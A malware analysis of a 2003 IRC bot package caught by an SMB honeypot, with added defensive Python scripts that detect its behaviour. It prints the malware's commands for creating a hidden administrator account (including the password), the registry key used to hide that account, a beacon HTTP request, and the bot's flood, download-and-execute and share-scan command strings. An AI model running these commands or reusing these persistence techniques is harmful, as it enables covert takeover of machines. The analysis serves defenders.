Revision History:
3 May 2003: Initial post.
21 June 2005: Updating.
This IRC bot package was received early on 13 April 2003 through a honeypot that simulates open file shares on TCP port 445, presented as a Windows 2000 system would present them; here is the log of that event (IP addresses removed):
04/13/03 07:03:20 GMT: connection
04/13/03 07:03:21 GMT: client disconnected
04/13/03 07:03:21 GMT: SMB session ended
04/13/03 07:03:21 GMT: connection
SMB_COM_SESSION_SETUP_ANDX(1): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: ''
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: 'administrator', Domain: 'H-V70V19M36LBDK', WKS: 'H-V70V19M36LBDK'
Wrote NTLMSSP_AUTH SMB to '.\NTL11D.tmp'
SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\ADMIN$'
SMB_COM_NT_CREATE_ANDX: '\system32\winhsvc32.exe' in TID = 0001
SMB_COM_CLOSE: FID = 0001
CLOSE: 'ADMIN$\system32\winhsvc32.exe' --> '.\SS211E.tmp', 279040
SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\IPC$'
SMB_COM_NT_CREATE_ANDX: '\svcctl' in TID = 0002
SMB_COM_TRANSACTION: not implemented error
SMB_COM_CLOSE: FID = 0002
SMB_COM_NT_CREATE_ANDX: '\svcctl' in TID = 0002
04/13/03 07:05:04 GMT: SMB session ended
As the log shows, a port-scan-style connection was made and dropped first: a full TCP connection with a three-way handshake and a normal shutdown-style teardown, immediately followed by the real SMB session.
It can also be seen that the file was to be copied to ADMIN$, the administrative share that Windows NT/2000/XP Professional and similar editions set up automatically. ADMIN$ maps to the Windows directory, so the path '\system32\winhsvc32.exe' put the file in the Windows System directory (SYSTEM32 on NT/2000/XP).
After the file is written to the target, the SMB/CIFS calls that open the \svcctl named pipe (the RPC endpoint of the Service Control Manager) are most likely used to install and/or start the copied file as a service; this is the same remote-execution technique PsExec-style tools use. The honeypot does not implement the transaction call over that pipe ("SMB_COM_TRANSACTION: not implemented error"), so the actual RPC requests were not captured. As seen below, the program can also install itself as a service locally; both the remote and the local install are straightforward to do with the Service Control Manager API (OpenSCManager, CreateService, StartService).
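The sequence in that log (executable written to an administrative share, then \svcctl opened over IPC$ in the same session) is the signature a defender would look for. The script below is an added example, not part of the original analysis or the honeypot's code: it groups honeypot log lines into SMB sessions, resolves each NT_CREATE to the share it was issued on, and reports sessions that match the pattern. The sample log is constructed from the event above plus one benign session; the line format, and the assumption that tree IDs are handed out in TREE_CONNECT order (0001, 0002, ...), as they are in the log above, are taken from that log.

```python
"""Detect the drop-to-ADMIN$-then-svcctl pattern in honeypot SMB logs.

Added example; it is not part of the original analysis or of the honeypot.
The log lines are constructed from the event shown above (plus one benign
session). The line format, with 'connection' opening a session and
'SMB session ended' closing it, and the assumption that tree IDs are
assigned in TREE_CONNECT order, are taken from that log.
"""
import re
from dataclasses import dataclass, field

SAMPLE_LOG = r"""04/13/03 07:03:20 GMT: connection
04/13/03 07:03:21 GMT: client disconnected
04/13/03 07:03:21 GMT: SMB session ended
04/13/03 07:03:21 GMT: connection
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: 'administrator', Domain: 'H-V70V19M36LBDK', WKS: 'H-V70V19M36LBDK'
SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\ADMIN$'
SMB_COM_NT_CREATE_ANDX: '\system32\winhsvc32.exe' in TID = 0001
SMB_COM_CLOSE: FID = 0001
SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\IPC$'
SMB_COM_NT_CREATE_ANDX: '\svcctl' in TID = 0002
SMB_COM_CLOSE: FID = 0002
04/13/03 07:05:04 GMT: SMB session ended
04/13/03 08:00:00 GMT: connection
SMB_COM_SESSION_SETUP_ANDX(3): OS: 'Windows 2000 2195', LM: 'Windows 2000 5.0', Dom: '' User: 'bob', Domain: 'WS1', WKS: 'WS1'
SMB_COM_TREE_CONNECT_ANDX: '\\66.75.XXX.XXX\IPC$'
SMB_COM_NT_CREATE_ANDX: '\srvsvc' in TID = 0001
04/13/03 08:00:02 GMT: SMB session ended
"""

CONNECT = re.compile(r"^SMB_COM_TREE_CONNECT_ANDX: '(?P<share>[^']+)'")
CREATE = re.compile(r"^SMB_COM_NT_CREATE_ANDX: '(?P<path>[^']+)' in TID = (?P<tid>[0-9A-Fa-f]+)")
USER = re.compile(r"User: '(?P<user>[^']*)'")
ADMIN_SHARES = {"ADMIN$", "C$"}     # shares that map onto the local file system
EXECUTABLE = (".exe", ".dll")


@dataclass
class Session:
    start: str
    user: str = ""
    tids: dict = field(default_factory=dict)    # TID -> share name
    opens: list = field(default_factory=list)   # (share, path), in order


def parse_sessions(text):
    """Group the log into sessions and resolve each NT_CREATE to its share."""
    sessions, cur = [], None
    for line in text.splitlines():
        if line.endswith(": connection"):
            cur = Session(start=line.split(" GMT")[0])
        elif line.endswith("SMB session ended"):
            if cur is not None:
                sessions.append(cur)
            cur = None
        elif cur is None:
            continue
        elif (m := USER.search(line)):
            cur.user = m.group("user")
        elif (m := CONNECT.match(line)):
            share = m.group("share").rsplit("\\", 1)[-1].upper()
            cur.tids[f"{len(cur.tids) + 1:04d}"] = share   # assumed sequential TIDs
        elif (m := CREATE.match(line)):
            cur.opens.append((cur.tids.get(m.group("tid"), "?"), m.group("path")))
    return sessions


def find_remote_service_installs(sessions):
    """Sessions that write an executable to an admin share, then open \\svcctl."""
    hits = []
    for s in sessions:
        drops = [i for i, (share, path) in enumerate(s.opens)
                 if share in ADMIN_SHARES and path.lower().endswith(EXECUTABLE)]
        if not drops:
            continue
        later = s.opens[drops[0] + 1:]
        if any(share == "IPC$" and path.lower() == r"\svcctl" for share, path in later):
            hits.append((s.start, s.user, [s.opens[i][1] for i in drops]))
    return hits


if __name__ == "__main__":
    for start, user, files in find_remote_service_installs(parse_sessions(SAMPLE_LOG)):
        print(f"{start}: user {user!r} dropped {files} and then opened \\svcctl")
```

The ordering check matters: an executable written to ADMIN$ alone is what a legitimate remote software push looks like, and opening \svcctl alone is what any `sc \\host query` does; it is the two in one session, in that order, that indicates remote service installation.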
As delivered, the file is packed with UPX and has embedded executables in it, including the Microsoft ntrights.exe tool, the "Blazing Tools Perfect Keylogger 1.2" program, and a SOCKS server backdoor. I ran the program on an isolated test system here. When run interactively, the program unpacks the embedded executables and installs itself as a local service. Here's a screenshot of the running processes on a Windows 2000 Professional system using SysInternals Process Explorer tool:
Most of the embedded files are unpacked to the Windows system directory, which on NT/2000/XP systems is named "SYSTEM32" by default and is a subdirectory of the Windows directory. On NT and 2000 the Windows directory defaults to "WINNT"; beginning with Windows XP the default name reverts to the one Windows 9x used, "WINDOWS". Here is part of the InCtrl5 report on the executable files created in that directory (the file-name column of the report did not survive; only the descriptions remain):
- Different versions of a SOCKS server. When run, the wwm.exe program opens TCP port 21422 for incoming commands.
- The aforementioned Microsoft tool (ntrights.exe).
- Files that appear to be "Blazing Tools Perfect Keylogger" program files.
The winhsvc32.exe program installs itself as a service after creating a user account whose name, "SUPPORT_4829d82", looks suspiciously like the SUPPORT_388945a0 account that XP creates by default as part of its Remote Assistance feature. See the screen grab of the similarly named account in an XP Home Edition installation. The account is created specifically for the service to run under; the commands to do this are embedded in the unpacked executable (the strings appear in the executable in a different order from the logical order shown here, and the order of execution may differ as well):
"net.exe" users SUPPORT_4829d82 7r0j1nm0053 /add /fullname:"Microsoft Corporation"
"net.exe" localgroup Administrators /add SUPPORT_4829d82
"ntrights.exe" -u SUPPORT_4829d82 +r SeServiceLogonRight
First, the account is created; the parameter after the user name is the password. Then the account is added to the local Administrators group. Finally, the ntrights tool (from the Windows Resource Kit) grants the account the "Log on as a service" right (SeServiceLogonRight), which any account other than LocalSystem needs before the Service Control Manager will start a service under it. The service is embedded within winhsvc32.exe and installs itself to run under that "special" account. The PEDUMP listing of the program's imports from ADVAPI32.dll shows the Service Control Manager functions (CreateServiceA, StartServiceA, and the rest) and the registry functions that accomplish this:
ADVAPI32.dll
  Import Lookup Table RVA:  00000000
  TimeDateStamp:            00000000
  ForwarderChain:           00000000
  DLL Name RVA:             000125B5
  Import Address Table RVA: 00010000
  Ordn  Name
     0  DeleteService
     0  OpenServiceA
     0  StartServiceA
     0  CloseServiceHandle
     0  CreateServiceA
     0  OpenSCManagerA
     0  SetServiceStatus
     0  RegCloseKey
     0  RegSetValueExA
     0  RegCreateKeyExA
     0  RegisterServiceCtrlHandlerA
     0  StartServiceCtrlDispatcherA
The account is configured like the XP account in another respect: it is hidden from the XP welcome screen and from the User Accounts control panel by adding a REG_DWORD value named after the account, with data 0, under the following Registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
This is another measure to keep the software's activities hidden from the owner/operator of the computer. The account still shows up in "net user", in the local Administrators group, and in Computer Management, so those are the places to look for it.
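A quick triage for this technique is to cross-reference the accounts hidden through UserList with the members of the local Administrators group; a hidden account that is also an administrator deserves a close look. The script below is an added example, not code from the original analysis: it parses the text output of two standard commands, "net localgroup Administrators" and "reg query" on the UserList key, as they would be collected from a suspect host, so it runs anywhere. Both outputs below are constructed samples (the HelpAssistant entry stands in for the accounts XP hides by default).

```python
"""Find local administrators hidden from the welcome screen via UserList.

Added example, not from the original analysis. Input is the captured text of
  net localgroup Administrators
  reg query "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList"
Both sample outputs below are constructed.
"""
import re

NET_LOCALGROUP_OUTPUT = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
SUPPORT_4829d82
The command completed successfully.
"""

REG_QUERY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    SUPPORT_4829d82    REG_DWORD    0x0
    HelpAssistant    REG_DWORD    0x0
"""

# "reg query" prints each value as: <indent> name <gap> type <gap> data
REG_VALUE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>\S+)\s*$")


def parse_localgroup_members(text):
    """Member names listed after the dashed separator in 'net localgroup' output."""
    lines = text.splitlines()
    try:
        start = next(i for i, line in enumerate(lines) if line.startswith("----"))
    except StopIteration:
        return set()
    members = set()
    for line in lines[start + 1:]:
        line = line.strip()
        if not line or line.startswith("The command completed"):
            break
        members.add(line)
    return members


def parse_userlist(text):
    """Account name -> DWORD data for every value under the UserList key."""
    hidden = {}
    for line in text.splitlines():
        m = REG_VALUE.match(line)
        if m and m.group("type") == "REG_DWORD":
            hidden[m.group("name")] = int(m.group("data"), 16)
    return hidden


def hidden_admins(localgroup_text, reg_text):
    """Accounts with UserList data 0 (hidden) that are also local administrators."""
    admins = {name.lower() for name in parse_localgroup_members(localgroup_text)}
    hidden = parse_userlist(reg_text)
    return sorted(name for name, data in hidden.items()
                  if data == 0 and name.lower() in admins)


if __name__ == "__main__":
    for name in hidden_admins(NET_LOCALGROUP_OUTPUT, REG_QUERY_OUTPUT):
        print(f"hidden local administrator: {name}")
```

Checking the "Log on as a service" right (the ntrights step above) needs a "secedit /export" of the local policy, which lists SIDs rather than names, so it is left out of this example.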
After the program first starts, installs itself as a service, and unpacks its pieces, it launches all three applications. Here are some of the things these programs do.
An SMTP engine is used to e-mail a receipt that the keystroke logger is now installed on the victimized computer. Here is the message it sent from the honeypot system to a Dynamic DNS hostname hardcoded into one of the programs:
From: *****
To: *****
Subject: Perfect Keylogger was installed successfully: 4/13/2003, XX:XX XM (GOO2000\Administrator)
Date: Sun, 13 Apr 2003 XX:XX:XX +0000
X-Mailer: CSMTPConnection v2.23
Content-Type: text/plain; charset=iso-8859-1

Perfect Keylogger was installed on the computer GOO2000, user Administrator at 4/13/2003, X:XX XM.
An HTTP request is sent to a second hardcoded Dynamic DNS hostname. The GET request excerpted below has non-ASCII bytes embedded in its Accept header; the header appears to be built from a buffer the bot never initialised (note the "MZ" at offset 0x48, the signature that begins every DOS/PE executable):
0x00000000: 47 45 54 20 2F 70 68 6F 72 6D 2E 70 68 70 3F 6E  GET /pho rm.php?n
0x00000010: 69 63 6B 3D 73 20 48 54 54 50 2F 31 2E 31 0D 0A  ick=s HT TP/1.1..
0x00000020: 41 63 63 65 70 74 3A 20 2A 2F 2A 2C 20 2C 20 2C  Accept:  */*, , ,
0x00000030: 20 2C 20 F0 FF 12 2C 20 8B F8 89 7D 94 39 75 E4   , ...,  ...}.9u.
0x00000040: 75 06 57 E8 E0 0D 2C 20 4D 5A 90 0D 0A 55 73 65  u.W...,  MZ...Use
0x00000050: 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61  r-Agent:  Mozilla
0x00000060: 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65  /4.0 (co mpatible
Here's the reply from the server:
0x00000000: 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1  200 OK.
0x00000010: 0A 44 61 74 65 3A 20 53 75 6E 2C 20 31 33 20 41  .Date: S un, 13 A
0x00000020: 70 72 20 32 30 30 33 20 58 58 3A 58 58 3A 58 58  pr 2003  XX:XX:XX
0x00000030: 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Se rver: Ap
0x00000040: 61 63 68 65 2F 31 2E 33 2E 32 37 20 28 55 6E 69  ache/1.3 .27 (Uni
0x00000050: 78 29 20 6D 6F 64 5F 6C 6F 67 5F 62 79 74 65 73  x) mod_l og_bytes
0x00000060: 2F 31 2E 32 20 6D 6F 64 5F 62 77 6C 69 6D 69 74  /1.2 mod _bwlimit
0x00000070: 65 64 2F 31 2E 30 20 50 48 50 2F 34 2E 33 2E 31  ed/1.0 P HP/4.3.1
0x00000080: 20 46 72 6F 6E 74 50 61 67 65 2F 35 2E 30 2E 32   FrontPa ge/5.0.2
0x00000090: 2E 32 35 31 30 20 6D 6F 64 5F 73 73 6C 2F 32 2E  .2510 mo d_ssl/2.
0x000000A0: 38 2E 31 32 20 4F 70 65 6E 53 53 4C 2F 30 2E 39  8.12 Ope nSSL/0.9
0x000000B0: 2E 36 62 0D 0A 58 2D 50 6F 77 65 72 65 64 2D 42  .6b..X-P owered-B
0x000000C0: 79 3A 20 50 48 50 2F 34 2E 33 2E 31 0D 0A 54 72  y: PHP/4 .3.1..Tr
0x000000D0: 61 6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A  ansfer-E ncoding:
0x000000E0: 20 63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74 65 6E   chunked ..Conten
0x000000F0: 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 6D  t-Type:  text/htm
0x00000100: 6C 0D 0A 0D 0A 30 0D 0A 0D 0A                    l....0.. ..
The body is a single zero-length chunk (the "0", CR LF, CR LF at the end), so the server returned nothing but headers. No other HTTP data was seen, and the malware tears the connection down with a TCP RST about five seconds later.
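Malformed headers like the Accept header above are a cheap beacon indicator: a real browser never puts bare control characters or high bytes into a header value. The script below is an added example, not from the original analysis: CAPTURED_GET is the request from the hex dump above rebuilt byte for byte, and because the dump is an excerpt the sample stops in the middle of the User-Agent header, exactly as the capture does, so the parser reports the truncation rather than guessing at the rest. It works on any raw request capture, not just this one.

```python
"""Audit a raw HTTP request for bytes that have no business in a header.

Added example, not from the original analysis. CAPTURED_GET reproduces the
hex dump above byte for byte; it ends mid-header because the dump does.
"""

CAPTURED_GET = (
    b"GET /phorm.php?nick=s HTTP/1.1\r\n"
    b"Accept: */*, , , , \xf0\xff\x12, \x8b\xf8\x89}\x949u\xe4u\x06W\xe8\xe0\r, MZ\x90\r\n"
    b"User-Agent: Mozilla/4.0 (compatible"
)

PRINTABLE = set(range(0x20, 0x7F)) | {0x09}   # visible ASCII, space and tab


def parse_request(raw):
    """Split a raw request into its request line and (name, value) header pairs.

    Headers are split on CR LF only, so a bare CR inside a value stays in the
    value. 'truncated' is set when the blank line ending the headers is absent.
    """
    head, terminator, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    path, _, query = target.partition(b"?")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().decode("ascii", "replace"), value.strip(b" \t")))
    return {"method": method, "path": path, "query": query, "version": version,
            "headers": headers, "truncated": terminator == b""}


def audit_request(raw):
    """Return the parsed request and one finding per header carrying bad bytes."""
    req = parse_request(raw)
    findings = []
    for name, value in req["headers"]:
        bad = [b for b in value if b not in PRINTABLE]
        if bad:
            findings.append({"header": name, "non_printable": len(bad),
                             "bare_cr": b"\r" in value})
    return req, findings


if __name__ == "__main__":
    req, findings = audit_request(CAPTURED_GET)
    print(req["method"], req["path"], req["query"], "truncated" if req["truncated"] else "")
    for f in findings:
        print(f)
```

On the capture above this reports 13 non-printable bytes in Accept, including a bare CR; a request that is merely truncated but otherwise well formed produces no findings, so the two conditions are kept separate.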
As mentioned above, the SOCKS server listens on TCP port 21422. The package wasn't run for very long; a port listener was established on that port and no incoming connections were observed.
The IRC bot connects to a third host, again a Dynamic DNS hostname hardcoded into one of the programs, along with the port number: the bot connects to the server's TCP port 21424 (not the conventional 6667) and begins an IRC session that remains active for as long as the service is allowed to run. During the time the bot was allowed to run, scores of computers joined and left the channel the bot had joined. The bot presumably responds to commands sent over that channel, but aside from the usual PING/PONG keepalives, no commands were observed while it ran.
It can be inferred from the route of infection and from the imports (WNetAddConnection2, which maps a remote share) that the bot has a routine to scan IP addresses for open file shares and infect the machines it finds; the "sharescan" command and the "Start=%s Current=%s ... %s infected" strings listed below point the same way.
The bot package wasn't run for very long, so there may have been other embedded functionality that wasn't observed due to the short time or overlooked in examining the executable internals. Obviously, disassembly would be the most thorough way to audit the full functionality of the malware.
There are a few different "classes" of IRC bots; two of the more popular are precompiled programs and mIRC-script-based bots. The bot in this package is the service already discussed, winhsvc32.exe, a precompiled program built with Microsoft Visual C++. Source code for many IRC bots is available, sdbot for example, and this program may turn out to be a variation on the sdbot code.
A quick way to peek into programs like this is to dump strings from the executable file; there are many implementations of programs that will "grep" through a sequence of bytes and display embedded strings. After unpacking the program with UPX, we used a utility from SysInternals. Here is an excerpt of the strings, focused on the IRC portions of the code (one string per line):
PRIVMSG
NOTICE
%s%s
%s%s%s
PRIVMSG %s :finished sending packets to %s.
PRIVMSG %s :error sending packets to %s.
PRIVMSG %s :finished sending pings to %s.
PRIVMSG %s :error sending pings to %s.
connection type: %s (%s).
local IP address: %d.%d.%d.%d.
connected from: %s
N/A
LAN
dial-up
url visited.
error visiting URL.
invalid URL.
WHOIS %s
%d, %d : USERID : UNIX : %s
bad url, or dns error.
update failed: error executing file.
downloaded %.1f kb to %s @ %.1f kb/sec. updating...
PRIVMSG %s :opened %s.
downloaded %.1f kb to %s @ %.1f kb/sec.
Aupdate (%s - %dkb transferred)
file download (%s - %dkb transferred)
PRIVMSG %s :couldn't open %s.
started scanning
already scanning
Inactive.
%s infected. %s threads. Start=%s Current=%s.
%s infected.
not scanning
stopped scanning
cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm
%s [%s]
???
USERHOST %s
user %s(%s) logged in.
password accepted.
user %s logged out.
QUIT :reconnecting
QUIT :%s
QUIT :later
%d. %s
-[thread list]-
%d. %s = %s
-[alias list]-
removing bot...
NICK %s
thread(s) killed.
QUIT :later
couldn't open file.
file opened.
couldn't resolve host
%s -> %s
PART %s
MODE %s
MODE %s
NICK %s
JOIN %s %s
PART %s
%s %s %s :%s
downloading update from %s...
update (%s)
%s\%s.exe
couldn't execute file.
clone created on %s:%d, in channel %s.
clone (%s)
redirect created on port %d to %s:%d.
redirect (%d->%s:%d)
ACTION %s
sending %d udp packets to: %s. packet size: %d, delay: %d[ms].
udp (%s)
icmp.dll not available
sending %d pings to %s. packet size: %d, timeout: %d[ms]
ping (%s)
ping
udp
c_a
c_action
c_pm
c_privmsg
redirect
download
clone
downloading %s...
download (%s)
install
execute
update
delay
c_p
c_part
c_j
c_join
c_n
c_nick
c_m
c_mode
c_r
c_raw
repeat
mode
cycle
action
privmsg
addalias
visit
dns
server
open
prefix
c_rn
c_rndnick
c_q
c_quit
killthread
raw
part
join
nick
stop
start
sharescan
remove
sysinfo
netinfo
log
aliases
threads
about
status
quit
disconnect
reconnect
logout
die
rndnick
$chr(
$server
$rndnick
$chan
$user
$me
$%d
$%d-
NOTICE %s :
VERSION %s
VERSION
login
332
joined channel %s.
353
QUIT
PART
NICK
screw you %s!
NOTICE %s :%s
user %s logged out.
KICK
302
005
001
JOIN %s %s
PONG %s
PING
WHOIS
list
NICK %s
USER %s 0 0 :%s
connected to %s.
bot started.
ctcp
raw PRIVMSG $1 :$chr(1)$2-$chr(1)
ping $1 10000 $2 50
udp $1 10000 2048 50
smack
action $chan smacks $1
opme
mode $chan +o $user
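The format strings above (NICK %s, USER %s 0 0 :%s, JOIN %s %s, PONG %s, and the numerics 001, 332 and 353) are plain RFC 1459 IRC, so a reassembled capture of the control channel, whatever port it runs on, can be read with an ordinary IRC line parser. The script below is an added example, not code from the page or from the bot: it parses IRC lines into prefix, command and parameters, then summarizes a session from the bot's side, which is what an analyst watching the channel wants (the bot's nick, the channel it joined, who else came and went, and any PRIVMSG traffic directed at it). The session is constructed from the bot's strings and standard IRC replies; the server name, nicks, channel, key and the "status" command are placeholders.

```python
"""Parse an IRC control-channel session and summarize it from the bot's side.

Added example, not from the original analysis or the bot. SESSION is a
constructed transcript: lines starting with '>' are sent by the bot, lines
starting with '<' come from the server; names and channel are placeholders.
"""
from dataclasses import dataclass


@dataclass
class IrcMessage:
    prefix: str      # sender, empty when the server sends without a prefix
    command: str     # verb or three-digit numeric
    params: list     # middle params followed by the trailing param, if any


def parse_line(line):
    """Split one IRC line into prefix, command and params (RFC 1459 2.3.1)."""
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:                      # first ' :' starts the trailing param
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if trailing is not None:
        parts.append(trailing)
    return IrcMessage(prefix, parts[0].upper(), parts[1:])


SESSION = """\
> NICK zx7k
> USER zx7k 0 0 :zx7k
< :irc.example.net 001 zx7k :Welcome to the network
> JOIN #ctrl ctrlkey
< :zx7k!zx7k@10.0.0.5 JOIN :#ctrl
< :irc.example.net 332 zx7k #ctrl :channel topic
< :irc.example.net 353 zx7k = #ctrl :zx7k bot1 bot2 @owner
< PING :irc.example.net
> PONG irc.example.net
< :bot3!x@10.0.0.9 JOIN :#ctrl
< :owner!o@10.0.0.1 PRIVMSG #ctrl :status
< :bot3!x@10.0.0.9 PART #ctrl
"""


def summarize(session_text):
    """Who the bot became, where it went, who else was there, what it was told."""
    s = {"nick": None, "channels": set(), "joined": set(), "parted": set(),
         "messages": [], "pings": 0, "pongs": 0}
    for raw in session_text.splitlines():
        direction, _, line = raw.partition(" ")
        msg = parse_line(line)
        if direction == ">":                       # bot -> server
            if msg.command == "NICK":
                s["nick"] = msg.params[0]
            elif msg.command == "JOIN":
                s["channels"].add(msg.params[0])
            elif msg.command == "PONG":
                s["pongs"] += 1
            continue
        sender = msg.prefix.split("!", 1)[0]       # server -> bot
        if msg.command == "PING":
            s["pings"] += 1
        elif msg.command == "JOIN" and sender != s["nick"]:
            s["joined"].add(sender)
        elif msg.command == "PART":
            s["parted"].add(sender)
        elif msg.command == "353":                 # names list: strip @ and + prefixes
            s["joined"].update(n.lstrip("@+") for n in msg.params[-1].split()
                               if n.lstrip("@+") != s["nick"])
        elif msg.command == "PRIVMSG":
            s["messages"].append((sender, msg.params[0], msg.params[-1]))
    return s


if __name__ == "__main__":
    for key, value in summarize(SESSION).items():
        print(f"{key}: {value}")
```

Because the bot's server lives on TCP 21424, a port-based IRC decoder will miss it; feed the parser the reassembled stream from whatever port the capture shows, and treat a JOIN/PART churn of "scores of computers" in one channel as the botnet indicator the page describes.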